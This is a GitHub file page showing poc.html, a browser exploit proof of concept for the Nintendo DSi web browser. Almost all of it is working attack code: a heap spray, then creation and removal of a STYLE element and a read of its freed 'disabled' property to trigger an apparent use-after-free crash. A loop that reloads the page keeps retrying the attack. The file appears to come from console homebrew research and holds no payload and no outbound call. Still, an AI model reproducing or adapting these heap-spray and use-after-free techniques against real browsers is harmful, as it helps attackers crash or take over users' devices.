-
Notifications
You must be signed in to change notification settings - Fork 4
/
poc.html
120 lines (87 loc) · 2.65 KB
/
poc.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
<html>
<head>
<meta http-equiv="refresh">
</head>
<body>
<h3>Nintendo DSi BrowserHax PoC</h3>
<hr>
<blink>Exploit in progress...</blink>
<div id="sandbox"></div>
<script>
var cur_obj; // Reference to currently tested object
var out_div; // Top-level sandbox in which cur_obj is created
var cur_tag; // Name of cur_obj tag
var spray_str;
/* Try to spray the memory with known strings to make fun crashes more visible */
function heap_spray() {
if (!spray_str) {
var spray_str = "AAAAAAAA";
/* TODO: TWEAK for DSi */
for (var i=0;i<12;i++) spray_str += spray_str;
}
window.name = Math.random() + spray_str + Math.random();
eval("window.name=''");
}
//Important for exploit stability, 10-100ms are okay
function sleep() {
setTimeout(function () {
return;
}, 100);
}
/* Log an event. */
function log(message) {
//console.log(message);
sleep();
return;
/*
var stateTemp = "NaN";
var request = new XMLHttpRequest();
request.open("GET", "debug.php?state=" + stateTemp + "&message=" + message, false);
request.send();
*/
}
/* Main browserhax function */
function dsihax() {
/*********************************************/
/* PHASE 0: Create new HTML tag in a sandbox */
/*********************************************/
log('+++ Phase 0: initialization +++');
try {
out_div.removeChild(cur_obj);
log('Previous object removed OK.');
} catch (e) {
log('Failed to remove previously used object.');
}
cur_tag = "STYLE";
log('Picked target tag: <' + cur_tag + '>');
cur_obj = document.createElement(cur_tag);
out_div.appendChild(cur_obj);
cur_obj.innerHTML = 'Hello world';
log('Populated object with sample HTML.');
cur_obj.value = 'Hello world';
log('Populated object with sample value.');
log('+++ Phase 1: discarding object +++');
heap_spray();
log('Trying to delete child node via DOM...');
try {
out_div.removeChild(cur_obj);
log('...success.');
} catch (e) {
log('...received exception (' + e + ')');
}
heap_spray();
if (cur_obj) {
log('+++ Phase 2: read objects "disabled" property value +++');
log('+++ This should crash the DSi. Retry when not... +++');
// read object disabled property, will crash the DSi, because use-after-free?
// sometimes returns randomly true/false or just crashes
var checkProp = cur_obj.disabled;
log('+++ property value is: ' + checkProp + ' +++');
}
}
heap_spray();
out_div = document.getElementById('sandbox');
out_div.innerHTML = '';
//Silent Retry until it works...
setInterval('try { dsihax() } catch (e) { location.reload(); }',1);
</script>